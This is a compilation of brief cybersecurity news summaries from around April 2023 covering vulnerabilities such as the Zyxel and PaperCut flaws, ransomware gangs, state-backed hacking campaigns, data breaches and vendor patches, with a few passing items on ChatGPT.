    Researchers from TRAPA Security have discovered a critical remote code execution vulnerability, tracked as CVE-2023-28771 (CVSS score 9.8), impacting Zyxel Firewall. The vulnerability is an improper error message handling in Zyxel ZyWALL/USG series firmware versions 4.60 through 4.73, VPN series firmware versions 4.60 through 5.35, USG FLEX series firmware versions 4.60 through 5.35, and ATP series firmware versions 4.60 through 5.35. A remote, unauthenticated attacker can trigger the flaw by sending specially crafted packets to a vulnerable device and execute some OS commands remotely.

    Tencent QQ Users Hacked in Mysterious Malware Attack, Says ESET

    Security researchers from ESET have linked a Chinese APT hacking group, Evasive Panda, to an attack that distributed the MsgBot malware via an automatic update for the Tencent QQ messaging app. Evasive Panda has been active since at least 2012, targeting organizations and individuals in mainland China, Hong Kong, Macao, Nigeria, and several countries in Southeast and East Asia. ESET discovered the latest capagin in January 2022, but evidence suggest it began in 2020. The victims of the campaign, primarily are members of an international NGO, are concentrated in the provinces of Gangsu, Guangdong, and Jiangsu, indicating a specific and targeted approach.

    Obscure Network Protocol Has Flaw That Could Unleash DDoS

    An obscure routing protocol codified during the 1990s has come roaring back to attention after researchers found a flaw that would allow attackers to initiate massive distributed denial-of-service attacks. Researchers from Bitsight and Curesec say they found a bug in Service Location Protocol. Service Location Protocol, the brainchild of executives from Sun Microsystems and a now-defunct internet service provider, was envisioned as a dynamic method of discovering resources such as printers on a closed enterprise network.

    Clop, LockBit Ransomware Gangs Behind Papercut Server Attacks

    On April 19th, PaperCut, a printing management software company, disclosed that threat actors were actively exploiting two flaws in PaperCut MF or NG, urging admins to upgrade their servers to the latest version as soon as possible. The flaws, tracked as CVE-2023-27350 and CVE-2023-27351, were fixed last month in the PaperCut Application Server and allow remote attackers to perform unauthenticated remote code execution and information disclosure.

    Chinese Hackers Use New Linux Malware Variants for Espionage

    Fresh Linux malware variations are being utilized by hackers in cyber espionage attacks, including a novel PingPull version and an undocumented backdoor known as Sword2033. Last year, PingPull was initially observed as a RAT ( remote access trojan) in espionage operations by the Chinese state-sponsored group, Gallium or Alloy Taurus, targeting government and financial institutions in Australia, Russia, Belgium, Malaysia, Vietnam and the Philippines.

    VMware Fixes Critical Zero-Day Exploit Chain Used at Pwn2own

    VMware has released security updates to address zero-day vulnerabilities that could be chained to gain code execution systems running unpatched versions of the company's Workstation and Fusion software hypervisors. The two flaws were part of an exploit chain demoed by the STAR Labs team's security researchers one month ago, during the second day of the Pwn2Own Vancouver 2023 hacking contest.

    New SLP Vulnerability Could Let Attackers Launch 2200x Powerful DDoS Attacks

    Bitsight and Curesec researchers Pedro Umbelino and Marco Lux recently uncovered a high-severity vulnerability impacting Service Location Protocol, a service discovery protocol that allows devices to find services in a local area network such as printers, file servers, and other network resources. The vulnerability in question is being tracked as CVE-2023-29552 (CVSS score: 8.6) and could be exploited to launch large scale denial-of-service (DoS) amplification attacks with a factor of 2,200 times, making it one of the largest amplification attacks to date.

    Exploit Released for Papercut Flaw Abused to Hijack Servers, Patch Now

    Threat actors are exploiting several vulnerabilities in the print management software, PaperCut MF/NG, to install Atera remote management software and take over servers. The vulnerabilities in question are being tracked as CVE-2023-27350 and CVE-2023-27351 and allow remote attackers to bypass authentication and execute arbitrary code on compromised PaperCut servers with SYSTEM privileges in low-complexity attacks that don't require user interaction.

    Google Ads Push BumbleBee Malware Used by Ransomware Gangs

    Researchers at Secureworks recently discovered a new campaign using Google advertisements that promote trojanized versions of popular apps to deliver BumbleBee malware to unsuspecting victims. Bumblebee is a malware loader discovered in April 2022, thought to have been developed by the Conti team as a replacement for the BazarLoader backdoor, used for gaining initial access to networks and conducting ransomware attacks.

    Intel CPUs Vulnerable to New Transient Execution Side-Channel Attack

    The attack works as a side channel to Meltdown, a critical security flaw discovered in 2018, impacting many x86-based microprocessors. Meltdown exploits a performance optimization feature called “speculative execution” to enable attackers to bypass memory isolation mechanisms to access secrets stored in kernel memory like passwords, encryption keys, and other private data.

    TP-Link Archer WiFi Router Flaw Exploited by Mirai Malware

    The TP-Link Archer A21 (AX1800) WiFi router vulnerability, known as CVE-2023-1389, is being exploited by the Mirai malware botnet to add devices to their DDoS attacks. The vulnerability was first exploited by two hacking teams during the Pwn2Own Toronto event in December 2022 using different methods of access to the route's LAN and WAN interfaces. TP- Link was made aware of the flaw in January 2023, and a patch was released last month via a firmware update. Last week, the Zero Day Initiative detected exploitation attempts in the wild, targeting Eastern Europe and spreading globally.

    Decoy Dog Malware Toolkit Found After Analyzing 70 Billion DNS Queries

    Researchers have uncovered a novel malware toolkit called Decoy Dog, which specifically targets enterprises. This toolkit is designed to bypass standard detection mechanisms by generating anomalous DNS traffic that is different from regular internet activity. Decoy Dog utlizes techniques like strategic domain aging and DNS query dribbling to establish a good reputation with security vendors before pivoting to conducting cybercrime operations.

    CISA Adds Minio, Papercut, and Chrome Bugs to Its Known Exploited Vulnerabilities Catalog

    According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog. Experts recommend also private organizations review the Catalog and address the vulnerabilities in their infrastructure.

    New All-in-One "EvilExtractor" Stealer for Windows Systems Surfaces on the Dark Web

    A new "all-in-one" stealer malware named EvilExtractor (also spelled Evil Extractor) is being marketed for sale for other threat actors to steal data and files from Windows systems. ‘It includes several modules that all work via an FTP service," Fortinet FortiGuard Labs researcher Cara Lin said.‘ It also contains environment checking and Anti-VM functions. Its primary purpose seems to be to steal browser data and information from compromised endpoints and then upload it to the attacker's FTP server.

    APC Warns of Critical Unauthenticated RCE Flaws in UPS Software

    APC's Easy UPS Online Monitoring Software is vulnerable to unauthenticated arbitrary remote code execution, allowing hackers to take over devices and, in a worst-case scenario, disabling its functionality altogether. Uninterruptible Power Supply (UPS) devices are vital in safeguarding data centers, server farms, and smaller network infrastructures by ensuring seamless operation amidst power fluctuations or outages. APC (by Schneider Electric) is one of the most popular UPS brands.

    Lazarus Hackers Now Push Linux Malware via Fake Job Offers

    Researchers have uncovered a fresh Lazarus campaign, known as “Operation DreamJob”, that has set its sights on Linux users with malware. This marks the first time Linux users have been targeted by this campaign. Researchers noted that this discovery has given them a high level confidence that Lazarus was responsible for the recent supply-chain attack on VoIP provider 3CX. Multiple companies were compromised in March 2023 when they used a trojanized version of the 3CX client, which contained information-stealing trojans.

    VMware Fixes Vrealize Bug That Let Attackers Run Code as Root

    VMware recently patched a critical vulnerability that could enable remote actors to gain remote execution on vulnerable appliances. Tracked as CVE-2023-20864, the flaw impacts VMware Aria Operations for Logs, a log analysis tool that is used to manage terabytes worth of application and infrastructure logs in large-scale environments.

    Cisco Industrial Network Director Vulnerabilities

    This week, Cisco addressed several flaws impacting its Industrial Network Director, which is designed to help “operations teams gain full visibility of network and automation devices in the context of the automation process and provides improved system availability and performance, leading to increased overall equipment effectiveness.” Most severe of the flaws is CVE-2023-20036, a critical (CVSS: 9.9) command injection vulnerability in the web UI of Cisco IND that could allow unauthenticated remote attackers to execute arbitrary commands with administrative privileges on the compromised devices.

    American Bar Association Data Breach Hits 1.4 Million Members

    The American Bar Association (ABA) has suffered a data breach after hackers compromised its network and gained access to older credentials for 1,466,000 members. The ABA is the largest association of lawyers and legal professionals globally, with 166,000 members as of 2022. The organization provides continuing education and services for lawyers and judges, as well as initiatives to improve the legal system in the USA

    Cyber Experts Predict More Harmful Cyberattacks in Ukraine

    Ukraine should brace for more Russian wiper and ransomware attacks, concluded a panel of cyber threat intel experts and government officials in a report assessing the cyber dimensions of Moscow's ongoing war of conquest against its European neighbor. The report, commissioned by the U.K. National Cyber Security Center, finds the tempo of destructive cyberattacks has ebbed and flowed across the first year of the Russian invasion.

    Ransomware Gangs Abuse Process Explorer Driver to Kill Security Software

    Aukill, a newly developed hacking tool, is being utilized by threat actors to disable Endpoint Detection & Response (EDR) Software on targeted systems. This is done in preparation for the deployment of backdoors and ransomware in what is known as Bring Your Own Vulnerable Driver (BYOVD) attacks. During such attacks, the perpetrators implant legitimate drivers that have been signed with a valid certificate and can operate with kernel privileges on the victims’ devices. This allows them to disable security solutions and take control of the system.

    North Korean Hackers Chained Supply Chain Hacks to Reach 3CX

    Mandiant investigators hired by 3CX now say the source of the infection was a decommissioned but still downloadable trading software package called X_Trader, made by Chicago-based Trading Technologies. A 3CX employee downloaded the trading package, said Charles Carmakal, Mandiant chief technology officer, during a Wednesday afternoon press briefing.

    Google TAG Warns of Russian Hackers Conducting Phishing Attacks in Ukraine - New resource in watched category

    Elite hackers associated with Russia's military intelligence service have been linked to large-volume phishing campaigns aimed at hundreds of users in Ukraine to extract intelligence and influence public discourse related to the war. Google's Threat Analysis Group (TAG), which is monitoring the activities of the actor under the name FROZENLAKE said the attacks continue the "group's 2022 focus on targeting webmail users in Eastern Europe." The state-sponsored cyber actor, also tracked as APT28, Fancy Bear, Forest Blizzard, Iron Twilight, Sednit, and Sofacy, is both highly active and proficient. It has been active since at least 2009, targeting media, governments, and military entities for espionage.

    Microsoft SQL Servers Hacked to Deploy Trigona Ransomware - New resource in watched category

    Attackers are hacking into poorly secured and Interned-exposed Microsoft SQL (MS-SQL) servers to deploy Trigona ransomware payloads and encrypt all files. The MS-SQL servers are being breached via brute-force or dictionary attacks that take advantage of easy-to-guess account credentials. After connecting to a server, the threat actors deploy malware dubbed CLR Shell by security researchers from South Korean cybersecurity firm AhnLab who spotted the attacks. This malware is used for harvesting system information, altering the compromised account's configuration, and escalating privileges to LocalSystem by exploiting a vulnerability in the Windows Secondary Logon Service (which will be required to launch the ransomware as a service). In the next stage, the attackers install and launch a dropper malware as the svcservice[.]exe service, which they use to launch the Trigona ransomware as svchost[.]exe

    Recycled Network Devices Exposing Corporate Secrets

    Over half (56%) of corporate network devices sold second-hand still contain sensitive company data, according to a new study from ESET. The security vendor bought 16 recycled devices routers and found that nine of them contained one or more IPsec or VPN credentials, or hashed root passwords, as well as enough information to identify the previous owner.

    Microsoft: Iranian Hackers Behind Retaliatory Cyberattacks on US Orgs

    According to a recent report from Microsoft’s Threat Intelligence team, Mint Sandstorm, a hacking group previously known as Phosphorous and believed to have ties to the Iranian government and the Islamic Revolutionary Guard Corps (IRGC), has shifted its focus from surveillance to direct attacks on critical infrastructure in the United States. The report states that a specific subgroup of Mint Sandstorm is responsible for this change in tactics. The new subgroup typically exploits newly publicized proof-of-concept exploits.

    TLP:GREEN - PWNYOURHOME, FINDMYPWN, LATENTIMAGE: 3 iOS Zero-Click exploits used by NSO Group in 2022

    A new report from Citizen Lab states that the Israeli surveillance firm NSO Group used at least three zero-click zero-day exploits to deliver its Pegasus spyware. In 2022, the Citizen Lab analyzed the NSO Group activity after finding evidence of attacks on members of Mexico’s civil society, including two human rights defenders from Centro PRODH, which represents victims of military abuses in Mexico.

    Play Ransomware Gang Uses Custom Shadow Volume Copy Data-Theft Tool

    The Play ransomware group has developed two custom tools in .NET, namely Grixba and VSS Copying Tool, which it uses to improve the effectiveness of its cyberattacks. Grixba is a network-scanning and information-stealing tool used to enumerate users and computers in a domain. When performing the scan function, Grixba will check for anti-virus and security programs, EDR suites, backup tools, and remote administration tools. Also, the scanner checks for common office applications and DirectX, potentially to determine the type of computer being scanned.

    Google Patches Another Actively Exploited Chrome Zero-Day

    On Tuesday, Google released security updates to address a high-severity vulnerability in the Chrome browser. Tracked as CVE-2023-2136, the flaw is related to an integer overflow vulnerability in Skia, a Google-owned open-source multi-platform 2D graphics library written in C++. For its part, Skia is a key component of Chrome’s rendering pipeline as it provides the browser a set of APIs for rendering graphics, text, shapes, images, and animations.

    US, UK Warn of Govt Hackers Using Custom Malware on Cisco Routers

    The US, UK, and Cisco are warning of Russian state-sponsored APT28 hackers deploying a custom malware named 'Jaguar Tooth' on Cisco IOS routers, allowing unauthenticated access to the device. APT28, also known as Fancy Bear, STRONTIUM, Sednit, and Sofacy, is a state-sponsored hacking group linked to Russia's General Staff Main Intelligence Directorate (GRU).

    AI Tools Like ChatGPT Expected to Fuel BEC Attacks

    Across all BEC attacks seen over the past year, 57% relied on language as the main attack vector to get them in front of unsuspecting employees, according to Armorblox. In other trends to watch, vendor compromise and fraud are rising as a new attack vector and graymail is wasting 27 hours of time for security teams each week. The report is based on data gathered across more than 58,000 customer tenants, analyzing over 4 billion emails and stopping 800,000 threats every month. SMBs are particularly vulnerable to vendor fraud and supply chain email attacks.

    Ex-Conti Members and FIN7 Devs Team Up to Push New Domino Malware

    Former Members of the Conti ransomware group have collaborated with FIN7 threat actors to spread a fresh kind of malware called ‘Domino’ to target corporate networks. The Domino malware is a recent addition to the malware family and includes two parts: the Domino Backdoor and the Domino Loader. The backdoor is responsible for dropping the Domino Loader, which then injects a malicious DLL into the memory of another process to extract confidential information.

    AI Tools Like ChatGPT Expected to Fuel BEC Attacks

    Across all BEC attacks seen over the past year, 57% relied on language as the main attack vector to get them in front of unsuspecting employees, according to Armorblox. In other trends to watch, vendor compromise and fraud are rising as a new attack vector and graymail is wasting 27 hours of time for security teams each week. The report is based on data gathered across more than 58,000 customer tenants, analyzing over 4 billion emails and stopping 800,000 threats every month.

    APT41 Abuses Google Command and Control Red Team Tool in Attacks Summary:

    The Chinese state-sponsored hacking group APT41 was found abusing the GC2 (Google Command and Control) red teaming tool in data theft attacks against a Taiwanese media and an Italian job search company. APT 41, is a Chinese state-sponsored hacking group known to target a wide range of industries in the USA, Asia, and Europe. Mandiant has been tracking the hacking group since 2014, saying its activities overlap with other known Chinese hacking groups, such as BARIUM and Winnti.

    Vice Society Gang is Using a Custom PowerShell Tool for Data Exfiltration

    Palo Alto Unit 42 team identified observed the Vice Society ransomware gang exfiltrating data from a victim network using a custom-built Microsoft PowerShell (PS) script. Threat actors are using the PowerShell tool to evade software and/or human-based security detection mechanisms. PS scripting is often used within a typical Windows environment, using a PowerShell-based tool can allow threat actors to hide in plain sight and get their code executed without raising suspicion.

    Hackers Start Abusing ACTION1 RMM in Ransomware Attacks

    Researchers caution that hackers are utilizing the Action1 remote access software more frequently to ensure their presence on breached networks and execute commands, scripts, and binaries. The Action1 is typically employed by managed service providers (MSPs) and businesses to remotely monitor and manage endpoints on a network. Although remote access tools are highly beneficial for system administrators, they also hold significant value for threat actors, who can exploit them to establish persistence on networks or distribute malware.

    Italy Bans ChatGPT Over Data Privacy Concerns

    In a move that one Italian minister has called “disproportionate”, Italy has temporarily banned ChatGPT due to data privacy concerns. Italy has made the decision to temporarily ban ChatGPT within the country due to concerns that it violates the General Data Protection Regulation (GDPR). GDPR is a law concerning data and data privacy which imposes security and privacy obligations on those operating within the European Union (EU) and the European Economic Area (EEA). The Italian data protection agency, Garante per la Protezione dei Dati Personali (also known as Garante) said there was an “absence of any legal basis that justifies the massive collection and storage of personal data” to “train” ChatGPT, in addition to accusing OpenAI of failing to verify the age of users of ChatGPT. Italy’s ban has led to privacy regulators in Ireland and France contacting the country’s data privacy agency to find out more regarding the decision to ban ChatGPT.

    LockBit Ransomware Encryptors Found Targeting Mac Devices

    The LockBit ransomware gang has created encryptors targeting Macs for the first time, likely becoming the first major ransomware operation to ever specifically target macOS. The new ransomware encryptors were discovered by cybersecurity researcher MalwareHunterTeam who found a ZIP archive on VirusTotal that contained what appears to be most of the available LockBit encryptors. Historically, the LockBit operation uses encryptors designed for attacks on Windows, Linux, and VMware ESXi servers. However, as shown below, this archive [VirusTotal] also contained previously unknown encryptors for macOS, ARM, FreeBSD, MIPS, and SPARC CPUs.

    Google Chrome Emergency Update Fixes First Zero-Day of 2023

    On Friday, Google released security updates to address a high-severity zero-day in Chrome web browser. Tracked as CVE-2023-2033, the vulnerability is related to a type confusion bug in the Chrome V8 JavaScript engine. “Although type confusion flaws would generally allow attackers to trigger browser crashes after successful exploitation by reading or writing memory out of buffer bounds, threat actors can also exploit them for arbitrary code execution on compromised devices” (Bleeping Computer, 2023). To address CVE-2023-2033, Google has released Chrome version 112.0.5615.121. Users have been advised to upgrade to the latest version as soon as possible.

    Over 20,000 Iowa Medicaid Members Affected By Data Breach

    Between June 30 and July 5, 2022, a cyber attack on the computer systems of a contractor exposed the personal information of 20,800 Iowans who are Medicaid recipients. The contractor, Telligen, had subcontracted part of its work to Independent Living Systems, which was targeted in the attack. Furthermore, the attack didn’t affect the Iowa Medicaid system itself.

    Severe Android and Novi Survey Vulnerabilities Under Active Exploitation

    CISA recently added two vulnerabilities (CVE-2023-20963, CVE-2023-29492) to its catalog of known exploited flaws. CVE-2023-20963 relates to a privilege escalation vulnerability in the Android Framework. According to Ars Technica, the tech news site disclosed last month that Android applications signed by China’s e-commerce company Pinduoduo weaponized the flaw to compromise devices and siphon sensitive data.

    Microsoft: Phishing Attack Targets Accountants as Tax Day Approaches

    Microsoft is warning of a phishing campaign targeting accounting firms and tax preparers with remote access malware allowing initial access to corporate networks. With the USA reaching the end of its annual tax season, accountants are scrambling to gather clients' tax documents to complete and file their tax returns. Due to this, it makes it an ideal time for threat actors to target tax preparers.

    Hikvision Fixed a Critical Flaw in Hybrid SAN and Cluster Storage Products

    Chinese video surveillance giant Hikvision addressed an access control vulnerability, tracked as CVE-2023-28808, affecting its Hybrid SAN and cluster storage products. An attacker with network access to the device can exploit the issue to obtain admin permission. The attacker can exploit the vulnerability by sending crafted messages to vulnerable devices.

    RTM Locker, A New RaaS Gains Notorieties in the Threat Landscape

    Researchers from cybersecurity firm Trellix have detailed the tactics, techniques, and procedures of an emerging cybercriminal gang called ‘Read The Manual RTM Locker. The group provides a ransomware-as-a-service (RaaS) and provides its malicious code to a network of affiliates by imposing strict rules. The group aims at flying below the radar, and like other groups, doesn’t target systems in the CIS region.

    Lazarus Group's DeathNote Campaign Reveals Shift in Targets

    The Lazarus Group, a notorious hacking group believed to be based in North Korea, has been observed a new cyber espionage campaign called DeathNote, targeting defense and government organizations in South Korea and Russia. Kaspersky’s senior security researcher, Seongsu Park, has been tracking the campaign, also known as Operation DreamJob or NukeSped, since 2019. The Lazarus group uses decoy documents related to cryptocurrency, such as questionnaires about buying crypto, to distribute malware. However, in April 2020, Kaspersky found a shift in targets and infection vectors.

    Fortinet Fixed a Critical Vulnerability in Its Data Analytics Product

    Fortinet has addressed a critical vulnerability, tracked as CVE-2022-41331 (a CVSS score of 9.3), in its Fortinet FortiPresence data analytics solution. FortiPresence is a comprehensive data analytics solution designed for analyzing user traffic and deriving usage patterns. Successful exploitation can lead to remote, unauthenticated access to Redis and MongoDB instances via crafted authentication requests.

    Russian Hackers Linked to Widespread Attacks Targeting NATO and EU

    Poland's Military Counterintelligence Service and its Computer Emergency Response Team have linked APT29 state-sponsored hackers, part of the Russian government's Foreign Intelligence Service (SVR), to widespread attacks targeting NATO and European Union countries. As part of this campaign, the cyberespionage group (also tracked as Cozy Bear and Nobelium) aimed to harvest information from diplomatic entities and foreign ministries.

    Windows Admins Warned to Patch Critical MSMQ QueueJumper Bug

    Security researchers and experts warn of a critical vulnerability in the Windows Message Queuing (MSMQ) middleware service patched by Microsoft during this month's Patch Tuesday and exposing hundreds of thousands of systems to attacks. MSMQ is available on all Windows operating systems as an optional component that provides apps with network communication capabilities with "guaranteed message delivery," and it can be enabled via PowerShell or the Control Panel.

    Hyundai Data Breach Exposes Owner Details in France and Italy

    Hyundai, a multinational automotive manufacturer recently disclosed a data breach impacting its Italian and French car owners as well as those those booked a test drive. According to several posts on Twitter, the following data was stolen in the attack:
    E-mail addresses
    Physical addresses
    Telephone numbers
    Vehicle chassis numbers
    Thankfully, Hyundai noted in its notification letter that no financial data or identification numbers were stolen by the hacker who managed to gain access to the company’s database. Since the attack, Hyundai says it has reached out to IT experts to conduct an incident response and to determine the full scope of the impact.

    iPhones Hacked via Invisible Calendar Invites to Drop Quadream Spyware

    Microsoft and Citizen Lab discovered commercial spyware created by an Israel-based company dubbed QuaDream. The spyware, which utilizes a zero-click exploit known as ENDOFDAYS, is used to compromise the iPhones of high-risk individuals. The attackers were able to exploit a zero-day vulnerability affecting iPhones running iOS 1.4 up to 14.4.2 from January 2021 to November 202, using iCloud calendar invitations that were backdated and invisible, according to Citizen Lab. The attacks affected at least five civil society victims in various regions and targeted journalists, political opposition figures, and an NGO worker. The surveillance malware (dubbed KingsPawn by Microsoft) used in the campaign can self-delete and clean out any tracks from victims' iPhones. The spyware contains a self-destruct feature that erases traces left behind. Further, the spyware contains features that can record environmental audio and calls.

    Hacked Sites Caught Spreading Malware Via Fake Chrome Updates

    Hackers are compromising websites to inject scripts that display fake Google Chrome automatic update errors that distribute malware to unaware visitors. The campaign has been underway since November 2022, and according to NTT's security analyst Rintaro Koike, it shifted up a gear after February 2023, expanding its targeting scope to cover users who speak Japanese, Korean, and Spanish. BleepingComputer has found numerous sites hacked in this malware distribution campaign, including adult sites, blogs, news sites, and online stores.

    Microsoft April 2023 Patch Tuesday fixes 1 zero-day, 97 flaws

    As part of the April Patch Tuesday, Microsoft addressed 97 flaws, including a zero-day vulnerability that is actively being exploited in attacks in the wild. Of the 97 flaws fixed, there was 20 Elevation of Privilege Vulnerabilities, 8 Security Feature Bypass Vulnerabilities, 45 Remote Code Execution Vulnerabilities, 10 Information Disclosure Vulnerabilities, 9 Denial of Service Vulnerabilities, and 6 Spoofing Vulnerabilities. 7 of the vulnerabilities are rated critical in severity and relate to remote code execution.

    Latitude Financial Refuses to Pay Ransom

    The Australian extender of consumer credit said in a Tuesday update on its ongoing ransomware incident that paying hackers "would not result in the return or destruction of the information that has been stolen." The company continues to experience service disruptions "as we secure our IT platforms," it said. Latitude Financial disclosed late last month that hackers said they stole approximately 7.9 million Australian and New Zealand driver's license numbers and an additional 6.1 million records -including names, addresses, phone numbers and birthdates - in a database containing information dating back to at least 2005. "Latitude will not pay a ransom to criminals," said CEO Bob Belan. The company on March 16 told regulators about the hacking incident, which is under investigation by the Australian Federal Police. Australian Minister of Home Affairs Clare O'Neil called Latitude's decision "consistent with Australian government advice.

    SAP Releases Security Updates for Two Critical-severity Flaws

    Enterprise software vendor SAP has released its April 2023 security updates for several of its products, which includes fixes for two critical-severity vulnerabilities that impact the SAP Diagnostics Agent and the SAP BusinessObjects Business Intelligence Platform. In total, SAP has released 24 notes, 19 of which concern new issues of varying importance, and five are updates to previous bulletins.

    A Cyber Attack Hit the Water Controllers for Irrigating Fields in the Jordan Valley

    The irrigation controllers responsible for managing water distribution fields in the Jordan Valley, operated by the Gaili Sewage Corporation, were paralyzed by a cyber attack. These controllers are critical for monitoring the irrigation process as well as wastewater treatment in the region. "The company experts spent the entire day recovering the operations, at this time the source of the attack is still unclear. “The management for both major systems was pushing all of Sunday morning to work through the issue and bring the systems back into full operation.” reported the Jerusalem Post.

    KFC, Pizza Hut Owner Discloses Data Breach After Ransomware Attack

    Yum! Brands, the brand owner of the KFC, Pizza Hut, and Taco Bell fast food chains, is now sending data breach notification letters to an undisclosed number of individuals whose personal information was stolen in a January 13 ransomware attack. This comes after the company said that although some data was stolen from its network, it has no evidence that the attackers exfiltrated any customer information.

    SD Worx Shuts Down UK Payroll, HR Services After Cyberattack

    SD Work, a European HR and payroll management company based in Belgium, recently suffered from a cyberattack, forcing the company to the shutdown of all of its IT systems for its UK and Ireland services. Due to the attack the company’s UK customer login portal is currently inaccessible. As of writing, It is unclear what type of attack occurred nor how the attackers gained access to SD Work’s systems. SD Work has already taken measures to isolate impacted systems and is currently investigating the scope of the attack.

    White House Probes Classified Intelligence 'Discord Leaks’

    A tranche of over 100 documents, some marked "Top Secret," appear to have been leaked in multiple batches beginning in January via the Discord messaging service. Apparently unnoticed at the time, the documents subsequently spread via 4Chan, Telegram and Twitter accounts. U.S. officials say the leaked documents may be genuine, although security experts who have reviewed them say some appear to have been doctored, sometimes crudely. The Pentagon has referred the matter to the Department of Justice, which confirmed Sunday that it has launched a criminal investigation into the leaks. Experts say the leaks reveal not just intelligence assessments but also certain capabilities, such as U.S. intelligence visibility into high-level Russian military planning, as well as the activities of the Wagner Group of mercenaries.

    CISA Orders Agencies to Patch Backup Exec Bugs Used by Ransomware Gang

    On April 10, 2023, CISA added five new security issues to its list of threats used by hackers, with three of them relating to Veritas Backup Exec, used in ransomware attacks. One of the vulnerabilities is a zero-day, which was exploited in an attack on Samsung's web browser, while another allowed attackers to increase privileges on Windows machines. One of the newly added vulnerabilities added to the known vulnerabilities catalog by CISA is considered critical. This vulnerability is CVE-2021-27877, found in Veritas data protection software, and enables remote access and command execution privileges.

    Apple Fixes Two Zero-Days Exploited to Hack iPhones and Macs

    Last Friday, Apple released security updates to address two zero-day vulnerabilities (CVE-2023-28206 and CVE-2023-28205) that were exploited in attacks to compromise iPhones, Macs, and iPads. CVE-2023-28206 is related to an out-of-bounds write flaw in an IOSurfaceAccelerator which could lead to potential data corruption or a system crash. In a hypothetical situation, an attacker can exploit the flaw by using a maliciously crafted app to execute arbitrary code with kernel level privileges. The second flaw addressed is related to a use after free bug in WebKit. It can be exploited by tricking victims into loading malicious web pages under the attacker’s control. Using these web pages, the attacker can further execute arbitrary code on the targeted system.

    Breached Shutdown Sparks Migration to ARES Data Leak Forums

    A threat group called ARES is gaining notoriety on the cybercrime scene by selling and leaking databases stolen from corporations and public authorities. The actor emerged on Telegram in late 2021 and has been associated with the RansomHouse ransomware operation and the data leak platform, KelvinSecurity, and the network access group Adrastea. ARES Group manages its own site with database leaks and a forum, which may fill the void left by the now defunct Breached forum.

    Microsoft Gets Court Order to Sinkhole Cobalt Strike Traffic

    A common thread in ransomware incidents is hackers' use of penetration testing tool Cobalt Strike. U.S. federal agencies have issued repeated warnings, particularly to the health sector, to be vigilant for its presence. Google in late 2022 released code allowing antivirus engines to detect it. Now, Cobalt Strike maker Fortra, Microsoft and the Health Information Sharing and Analysis Center have obtained a U.S. federal court order redirecting into sinkhole servers the internet traffic from Cobalt Strike-infected computers sent to command-and-control centers controlled by bad actors. The order affects server internet protocol addresses hosted by data centers across the United States and a slew of malicious domains. "Instead of disrupting the command and control of a malware family, this time we are working with Fortra to remove illegal legacy copies of Cobalt Strike so they can no longer be used by cybercriminals, said Amy Hogan-Burney, general manager of Microsoft's Digital Crimes Unit. A complaint filed in the U.S. District Court for the Eastern District of New York by the three plaintiffs details a history of unlicensed versions of Cobalt Strike being used by hackers to pave the way for ransomware attacks by the likes of LockBit and Conti and its many spinoff groups.

    Iran-linked MERCURY APT Behind Destructive Attacks on Hybrid Environments

    The Microsoft Threat Intelligence team observed a series of destructive attacks on hybrid environments that were carried out by the MuddyWater APT group (aka MERCURY). The threat actors masqueraded the attacks as a standard ransomware operation” (Security Affairs, 2023). MuddyWater has been active since around 2017. Back in January of 2022, USCCYERCOM officially linked the Iranian APT group to Iran’s Ministry of Intelligence and Security (MOIS).

    US Trauma Centers Hit by KillNet's Recent DDoS Barrage

    US trauma centers have been targeted in a recent distributed denial of the service attack campaign, known as Killnet. The attack involves flooding targeted websites with traffic from botnets, making them inaccessible to legitimate users. Most of the targeted organizations had one or more level 1 trauma centers, suggesting that the attackers aimed to cause disruptions to critical care for the most seriously ill and injured patients.

    Medusa Ransomware Claims Attack on Open University of Cyprus

    Medusa ransomware has claimed responsibility for a cyberattack targeting the Open University of Cyprus (OUC). OUC is a online university located in Nicosia, Cyprus which offers 30 high-level education programs to 4,200 students and participates in various scientific research activities. In a public announcement last week, the university stated that the attack took place on March 27, causing several central services and critical services to go offline.

    Sophos Patches Critical Code Execution Vulnerability in Web Security Appliance

    Sophos recently published security updates to address several vulnerabilities in the Sophos Web Appliance, a security solution that is used by administrators to set web access policies from a single interface. The most severe of the flaws is being tracked as CVE-2023-1671 (CVSS score of 9.8) and is related to a pre-authentication command infection vulnerability in the warn-proceed handler. Successful exploitation could lead to potential arbitrary code execution.

    Law Enforcement Lures Cybercriminals With Fake DDoS Services

    ow many sites the NCA is running and what it offers aren't exactly clear - a ploy at the heart of this newly disclosed effort, part of Operation PowerOff. Authorities say it's designed to sow confusion and doubt and undermine trust in the criminal market. Paranoia, they hope, runs deep. Call it an escalation in the never-ending fight against booter sites, which allow individuals with little technical ability to easily commit cybercrimes. "Booter/stresser services are like grass: You can mow the lawn, but the grass will grow back," Daniel Smith, head of research for cybersecurity firm Radware's threat intelligence division, said. "The problem with enforcement is the reaction. As law enforcement worldwide steps up their efforts to reduce crime, the criminals will escalate in lockstep, as there is too much profit involved in cybercrime for everyone to be scared away." Fostering uncertainty among customers is another way to attempt to reduce the proliferation of booter sites.

    Telegram Now the Go-to Place for Selling Phishing Tools and Services

    Telegram has emerged as a preferred platform for phishing bots and kit creators to promote their products and attract unpaid collaborators. Previously, the messaging platform was for cybercriminal activities for several years. It appears that threat actors in the phishing business are increasingly depending on it for their operations. Researchers at the cybersecurity firm Kaspersky have noted a surge in the popularity of phishing on Telegram, with a growing community of actors offering services, advice, and free instructions for newcomers. This active community of phishing actors on Telegram is involved in various activities related to illicit practice.

    Money Message Ransomware Gang Claims MSI breach, Demands $4 Million

    Taiwanese PC parts maker MSI (Micro-Star International) has been listed on the extortion portal of a new ransomware gang known as "Money Message," which claims to have stolen source code from the company's network. MSI is a global hardware giant that makes motherboards, graphics cards, desktops, laptops, servers, industrial systems, PC peripherals, and infotainment products, with an annual revenue that surpasses $6.5 billion. The threat actor has listed MSI on its data leak website and posted screenshots of what they claim to be the hardware vendor's CTMS and ERP databases and files containing software source code, private keys, and BIOS firmware. Money Message now threatens to publish all these allegedly stolen documents in about five days unless MSI meets its ransom payment demands.

    Typhon Reborn Stealer Malware Resurfaces with Advanced Evasion Techniques

    Authors behind Typhon Reborn recently updated the information stealing malware, coming out with version 2, which features defense evasion capabilities. First documented by Cyble in August 2022, Typhon is capable of hijacking clipboard content, capturing screenshots, logging keystrokes, and stealing data from crypto wallet, messaging, FTP, VPN, browser, and gaming apps. According to researchers, the latest version features increased anti-analysis techniques and an improved stealer and file grabber.

